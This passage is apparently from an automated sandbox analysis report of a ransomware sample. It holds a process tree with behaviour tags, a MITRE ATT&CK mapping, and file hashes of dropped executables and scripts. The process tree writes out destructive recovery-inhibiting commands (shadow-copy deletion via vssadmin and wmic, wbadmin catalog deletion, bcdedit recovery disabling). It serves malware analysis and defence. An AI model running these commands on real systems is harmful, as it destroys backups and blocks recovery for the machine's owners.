- Views/modifies file attributes
PID:808

C:\Windows\SysWOW64\timeout.exe
timeout 2
6⤵
- Delays execution with timeout.exe
PID:1148

C:\ssd\onset\mesager43.exe
mesager43.exe /start
6⤵
- Executes dropped EXE
- Loads dropped DLL
- Adds Run key to start application
- Modifies system certificate store
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:524

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\taskeng.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\taskeng.exe" -start
7⤵
- Executes dropped EXE
- Enumerates connected drives
- Modifies system certificate store
PID:752

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C wmic shadowcopy delete
8⤵
PID:1664

C:\Windows\SysWOW64\Wbem\WMIC.exe
wmic shadowcopy delete
9⤵
- Suspicious use of AdjustPrivilegeToken
PID:828

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C bcdedit /set {default} recoveryenabled no
8⤵
PID:876

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C bcdedit /set {default} bootstatuspolicy ignoreallfailures
8⤵
PID:904

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C wbadmin delete catalog -quiet
8⤵
PID:1720

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C vssadmin delete shadows /all /quiet
8⤵
PID:520

C:\Windows\SysWOW64\vssadmin.exe
vssadmin delete shadows /all /quiet
9⤵
- Interacts with shadow copies
PID:836

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\~temp001.bat
8⤵
PID:932

C:\Windows\SysWOW64\Wbem\WMIC.exe
wmic shadowcopy delete
9⤵
- Suspicious use of AdjustPrivilegeToken
PID:964

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\taskeng.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\taskeng.exe" -agent 0
8⤵
- Executes dropped EXE
- Drops file in Program Files directory
PID:2044

C:\Windows\SysWOW64\notepad.exe
notepad.exe
7⤵
- Suspicious use of WriteProcessMemory
PID:1256

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1256 -s 196
8⤵
- Program crash
PID:1756

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im 15sp.exe
6⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1444

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im 15sp.exe
6⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1668

C:\Windows\SysWOW64\attrib.exe
attrib -s -h "C:\ssd\onset\mesager43.exe"
6⤵
- Views/modifies file attributes
PID:1692

C:\Windows\SysWOW64\timeout.exe
timeout 4
6⤵
- Delays execution with timeout.exe
PID:956

C:\Windows\SysWOW64\timeout.exe
timeout 4
4⤵
- Delays execution with timeout.exe
PID:1184

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
PID:532

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Hidden Files and Directories

T1158

Registry Run Keys / Startup Folder

T1060

Privilege Escalation

Defense Evasion

File Deletion

T1107

Hidden Files and Directories

T1158

Modify Registry

T1112

Install Root Certificate

T1130

Credential Access

Discovery

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Web Service

T1102

Impact

Inhibit System Recovery

T1490

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\07CEF2F654E3ED6050FFC9B6EB844250_3F26ED5DE6B4E859CCCA6035ECB8D9CB
MD5
1c7207d15a7f303c73d5d89d6aae43be

SHA1
19fe550a31cf89ab706e3ebcd6fcc78ca57bdeac

SHA256
52a8f1b16a9d4bcec89850a5f6d30488cd8390d0e6bc19eaea5a138d5dc64dc9

SHA512
d6216aa45ffcd9345139792c94a55d53fe40f775d42a6d6127fc2cb066c653bdc005d133ed85d73aa34f1bcf634c221c7624a7e840c2424cf1f29a2bcd088342

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\204C1AA6F6114E6A513754A2AB5760FA_0673414C08DE7F919AE3F6C4CC65AEEE
MD5
5bfa51f3a417b98e7443eca90fc94703

SHA1
8c015d80b8a23f780bdd215dc842b0f5551f63bd

SHA256
bebe2853a3485d1c2e5c5be4249183e0ddaff9f87de71652371700a89d937128

SHA512
4cd03686254bb28754cbaa635ae1264723e2be80ce1dd0f78d1ab7aee72232f5b285f79e488e9c5c49ff343015bd07bb8433d6cee08ae3cea8c317303e3ac399

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015
MD5
637481df32351129e60560d5a5c100b5

SHA1
a46aee6e5a4a4893fba5806bcc14fc7fb3ce80ae

SHA256
1f1029d94ca4656a577d554cedd79d447658f475af08620084897a5523587052

SHA512
604bfd0a78a57dfddd45872803501ad89491e37e89e0778b0f13644fa9164ff509955a57469dfdd65a05bbedaf0acb669f68430e84800d17efe7d360a70569e3

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B1230D967FD647CD5194F3FFA6C7E7E4
MD5
0f96cf32580efc867ff48db74bc92e4b

SHA1
2d16ce1151807b1cc5445db9bd511d0a2c90cf01

SHA256
7176b87dd59195a7e0fb8624010b143d1ca991161748e2cd38a88a4eec91a8da

SHA512
9d9e74180ef53053ebcfe25dd50659b002a4422c9253b82c78804b97329b57ea1ee19edf9eadec09d45f1b034270a15a7da5e5943406415dc259ca58fa459dbe

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B2FAF7692FD9FFBD64EDE317E42334BA_D7393C8F62BDE4D4CB606228BC7A711E
MD5
c167da7b8b4c7fcda6675c7e0088f400

SHA1
994596505635ae1ea5d515c3812bde4da71453da

SHA256
393c90d40294d1f9e4875acc639b3c1b0207a68c7ca49aaf715f97746c128062

SHA512
8fbb72b5d58e34709eb545ab324112d4392f3af389b68b1e184d885ea210f529dede92167578687f47c1b40e49341cbbd62eaf8d71dc09397b5d44a4c9b767f0

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\07CEF2F654E3ED6050FFC9B6EB844250_3F26ED5DE6B4E859CCCA6035ECB8D9CB
MD5
3caf3dd3503b9f6591d281490d2497d4

SHA1
c818c6a3c119d5f01becc659ef9bab37274c0619

SHA256
f760ac6ece634538ac15df1164b7d4816c415c29e876cbdc374fc37f07e64394

SHA512
a0d7a2e342df1094b0870bbd35e23d6942ae42a87940ba020bdb55d0e7d1f032e0b711ac43311b1591410c02c852c9b8b9e451f5f20aff0a7eedb6e5637e1dd8

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\204C1AA6F6114E6A513754A2AB5760FA_0673414C08DE7F919AE3F6C4CC65AEEE
MD5
d019bef44d618ce018e02fe72c0ce758

SHA1
2df363d24a3dbf3205a022fba0eaed41386ff373

SHA256
c579075ce731a67dcd94382f109b90cfd5ddc3ea37f3a56698191e2f1e521225

SHA512
6430c2f24c40ed139309e97258e35efd8591c48238c98f863f927288846a0b9bdc92c316c4af185b52d36c4424b094df8b2f0527ebfe649b81613d78e17a0b96

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
MD5
6765d5c6d151290f71dc6c4ad37047b7

SHA1
b80832205b5a31954694c6266bb2eefd96a2f84d

SHA256
fa7c03e72f7ec2da4a3f2f5cf89906d86ffda98a619a910658658033466327b4

SHA512
b78ef50a3b60b46d089e39a38072198be365d368b3b79bfd8e7199d2ad6965729b06d24bce8b36c0d45eeff121642cc830301003b9791e4482e8c97e46adf5d3

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B1230D967FD647CD5194F3FFA6C7E7E4
MD5
3c42117747e36479063d033702144d65

SHA1
f3cfa34902e73b44e17cb5bd3d031ec8eea582ea

SHA256
3fc449fe766de1badbd0cb04b249949efdff33db4d46cb29c32eb0dc950eae55

SHA512
9cda54cf3d6d33527b2a455ce6577dad2118b7217c0b5b7299d6048f40a4123f619f008f2fe7702eb8dc93d6ed9f5c2f8164a374e8b19e3a104d1f54357b22a6

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B2FAF7692FD9FFBD64EDE317E42334BA_D7393C8F62BDE4D4CB606228BC7A711E
MD5
53336a03697c87ac5a3263981f855dc0

SHA1
498553f7832b2cd85e3751fd6c2f72f4dfa5b490

SHA256
96b82f9fdeb94c60aa290f63565b4f94f66b58692875f3559271c66e7fa5c55c

SHA512
937c504016e0e006369ae4adebafbf18972e0d63d192aba55d8f6d1dfdb494064a664f4fed38f59a4554c202603be55a31b5cfd631a5b5af24d8ecd6ba60bd72

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T7QQD7BH\IH7EY2IX.htm
MD5
b1cd7c031debba3a5c77b39b6791c1a7

SHA1
e5d91e14e9c685b06f00e550d9e189deb2075f76

SHA256
57ba053f075e0b80f747f3102ed985687c16a8754d109e7c4d33633269a36aaa

SHA512
d2bbefdc1effb52a38964c4cec5990a5a226248eca36f99e446c0c5704436f666bf1cb514e73b8991411d497d3325ecc646cbd5065c364e92ab6b9c5f1ad4a72

Download Submit
C:\Users\Admin\AppData\Local\Temp\~temp001.bat
MD5
ef572e2c7b1bbd57654b36e8dcfdc37a

SHA1
b84c4db6d0dfd415c289d0c8ae099aea4001e3b7

SHA256
e6e609db3f387f42bfd16dd9e5695ddc2b73d86ae12baf4f0dfc4edda4a96a64

SHA512
b8c014b242e8e8f42da37b75fe96c52cd25ebd366d0b5103bcba5ac041806d13142a62351edecdee583d494d2a120f9b330f6229b1b5fe820e1c7d98981089e9

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\taskeng.exe
MD5
3163bba8a4861d47aafa1667d3082fee

SHA1
32824014c8740b8fef306e742c891bec0ef068d3

SHA256
39016358b939b83cf9997c447458ae2d13186c3f66e66784c9e8ff4031b60c7e

SHA512
e25f77dd78df4a80ec02f01c8c6ed85fa0f9028ea87b899ffa0a5a87d211cb8c861d4e7912bb8d3cc3ee0a7240eb130f0abd6ffa0d3698b3d416c70de52eb450

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\taskeng.exe
MD5
3163bba8a4861d47aafa1667d3082fee

SHA1
32824014c8740b8fef306e742c891bec0ef068d3

SHA256
39016358b939b83cf9997c447458ae2d13186c3f66e66784c9e8ff4031b60c7e

SHA512
e25f77dd78df4a80ec02f01c8c6ed85fa0f9028ea87b899ffa0a5a87d211cb8c861d4e7912bb8d3cc3ee0a7240eb130f0abd6ffa0d3698b3d416c70de52eb450

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\taskeng.exe
MD5
3163bba8a4861d47aafa1667d3082fee

SHA1
32824014c8740b8fef306e742c891bec0ef068d3

SHA256
39016358b939b83cf9997c447458ae2d13186c3f66e66784c9e8ff4031b60c7e

SHA512
e25f77dd78df4a80ec02f01c8c6ed85fa0f9028ea87b899ffa0a5a87d211cb8c861d4e7912bb8d3cc3ee0a7240eb130f0abd6ffa0d3698b3d416c70de52eb450

Download Submit
C:\ssd\onset\15sp.exe
MD5
061f64173293969577916832be29b90d

SHA1
b05b80385de20463a80b6c9c39bd1d53123aab9b

SHA256
34dfe4869b0a524c63cc4696fafe30c83a22dc5fe4b994b9fe777f2c986733ce

SHA512
66e284f7c7e40af988ab09ff48cc786d287ac906368042d98d313be764058f01ecb5c3a7ab8d4336ee6494ea4a1347e73f0f2b4f3baec25ca6bcec1d888bd3da

Download Submit
C:\ssd\onset\15sp.exe
MD5
061f64173293969577916832be29b90d

SHA1
b05b80385de20463a80b6c9c39bd1d53123aab9b

SHA256
34dfe4869b0a524c63cc4696fafe30c83a22dc5fe4b994b9fe777f2c986733ce

SHA512
66e284f7c7e40af988ab09ff48cc786d287ac906368042d98d313be764058f01ecb5c3a7ab8d4336ee6494ea4a1347e73f0f2b4f3baec25ca6bcec1d888bd3da

Download Submit
C:\ssd\onset\58nfs.ini
MD5
42f9b29cb18cec22cf1f68375685ddc2

SHA1
54de5fd042aa740be90f85d7887d41ebc0e00b4b

SHA256
7aac762ca37c72400df369c6a25d81e758071e570f8dd68f136290923165d007

SHA512
f4065bc2b1b5ef8577c22ee6fe3ee4e5ee9af413d7a693940e317d2ab23de4ac64079761469369b282665c5d19fd3beb9a9ecd0af64a40531df946c65f36ab5c

Download Submit
C:\ssd\onset\81ldp.bat
MD5
a5464805722aa29200eb97cb26605135

SHA1
80b2c57e6475325a89eaaba24db02685830018ea

SHA256
03130577ed6032ec6fce61f3f4a52fbfd2e7eb69ca1901823682b392f89c0e8a

SHA512
d99760c1a82e2bd46d4d400c60c2c7a1fdfa057b84c6de2e992e19c662f62aed357e67c6f326e989124ccf7b67b57e1157b124e9bee4765e4f6730fb57660aae

Download Submit
C:\ssd\onset\Ztestram.vbs
MD5
b835e273fb843348db5f05d2ed0958e8

SHA1
8a5feab98df1ef7a898863e941e8bb07d007b9c1

SHA256
066327629f90b617ff1980f80a69ff3f5d76b4b005bfe9ee1a52319bc5517c94

SHA512
5438cd64586b1bfb6b555b9183e50cfae143306b163d7b4810383198cb8afcee3b5631a4f7cfb65561c2bb9babfaf70e8403937ae8d80cae93e9cd57e5c8331e

Download Submit
C:\ssd\onset\goodram.vbs
MD5
1ed7cb327b190a41ed8aee89c9be87d1

SHA1
6bd8634e530a6911501f1ab1c23fa4282d3a9e4f

SHA256
c31b950a44c81e1aaa37c495da1cf671ef730a5d1efbf5e68a875bf998c94663

SHA512
a9b85159614d71f91f05d9f1a4f65085105591ef7ca6d4094e171121e4259ebeca65fe490c28846b8d5791ef15cd7c01d56c7114aab517bab64c2f262c3dfb7c

Download Submit
C:\ssd\onset\mesager43.exe
MD5
3163bba8a4861d47aafa1667d3082fee

SHA1
32824014c8740b8fef306e742c891bec0ef068d3

SHA256
39016358b939b83cf9997c447458ae2d13186c3f66e66784c9e8ff4031b60c7e

SHA512
e25f77dd78df4a80ec02f01c8c6ed85fa0f9028ea87b899ffa0a5a87d211cb8c861d4e7912bb8d3cc3ee0a7240eb130f0abd6ffa0d3698b3d416c70de52eb450

Download Submit
C:\ssd\onset\mesager43.exe
MD5
3163bba8a4861d47aafa1667d3082fee

SHA1
32824014c8740b8fef306e742c891bec0ef068d3

SHA256
39016358b939b83cf9997c447458ae2d13186c3f66e66784c9e8ff4031b60c7e

SHA512
e25f77dd78df4a80ec02f01c8c6ed85fa0f9028ea87b899ffa0a5a87d211cb8c861d4e7912bb8d3cc3ee0a7240eb130f0abd6ffa0d3698b3d416c70de52eb450

Download Submit
C:\ssd\onset\sata1.bat
MD5
03560667f8a4144f8d45f917fd522a95

SHA1
df8ec645f2cbecb9388c87a63674b508a791433e

SHA256
41e9529c2acd43b7a206ec80655016bb65ba6721acfd930d351399730e809ad1

SHA512
215824afaaf96acef5977a7e6f48b2133cd969b1d809db333bf1b700176dfaa745141aade50fb4bec1151087a3deb2d64ae542b2405a17ec53d17fbc69052ad4

Download Submit
\Users\Admin\AppData\Roaming\Microsoft\Windows\taskeng.exe
MD5
3163bba8a4861d47aafa1667d3082fee

SHA1
32824014c8740b8fef306e742c891bec0ef068d3

SHA256
39016358b939b83cf9997c447458ae2d13186c3f66e66784c9e8ff4031b60c7e

SHA512
e25f77dd78df4a80ec02f01c8c6ed85fa0f9028ea87b899ffa0a5a87d211cb8c861d4e7912bb8d3cc3ee0a7240eb130f0abd6ffa0d3698b3d416c70de52eb450

Download Submit
\Users\Admin\AppData\Roaming\Microsoft\Windows\taskeng.exe
MD5
3163bba8a4861d47aafa1667d3082fee

SHA1
32824014c8740b8fef306e742c891bec0ef068d3

SHA256
39016358b939b83cf9997c447458ae2d13186c3f66e66784c9e8ff4031b60c7e

SHA512
e25f77dd78df4a80ec02f01c8c6ed85fa0f9028ea87b899ffa0a5a87d211cb8c861d4e7912bb8d3cc3ee0a7240eb130f0abd6ffa0d3698b3d416c70de52eb450

Download Submit
\ssd\onset\15sp.exe
MD5
061f64173293969577916832be29b90d

SHA1
b05b80385de20463a80b6c9c39bd1d53123aab9b

SHA256
34dfe4869b0a524c63cc4696fafe30c83a22dc5fe4b994b9fe777f2c986733ce

SHA512
66e284f7c7e40af988ab09ff48cc786d287ac906368042d98d313be764058f01ecb5c3a7ab8d4336ee6494ea4a1347e73f0f2b4f3baec25ca6bcec1d888bd3da

Download Submit
\ssd\onset\mesager43.exe
MD5
3163bba8a4861d47aafa1667d3082fee

SHA1
32824014c8740b8fef306e742c891bec0ef068d3

SHA256
39016358b939b83cf9997c447458ae2d13186c3f66e66784c9e8ff4031b60c7e

SHA512
e25f77dd78df4a80ec02f01c8c6ed85fa0f9028ea87b899ffa0a5a87d211cb8c861d4e7912bb8d3cc3ee0a7240eb130f0abd6ffa0d3698b3d416c70de52eb450

Download Submit
\ssd\onset\mesager43.exe
MD5
3163bba8a4861d47aafa1667d3082fee

SHA1
32824014c8740b8fef306e742c891bec0ef068d3

SHA256
39016358b939b83cf9997c447458ae2d13186c3f66e66784c9e8ff4031b60c7e

SHA512
e25f77dd78df4a80ec02f01c8c6ed85fa0f9028ea87b899ffa0a5a87d211cb8c861d4e7912bb8d3cc3ee0a7240eb130f0abd6ffa0d3698b3d416c70de52eb450

Download Submit
memory/1256-93-0x0000000000080000-0x0000000000081000-memory.dmp

Filesize
4KB

Download
memory/1588-55-0x0000000075801000-0x0000000075803000-memory.dmp

Filesize
8KB

Download
memory/1588-56-0x00000000003C0000-0x00000000003C1000-memory.dmp

Filesize
4KB

Download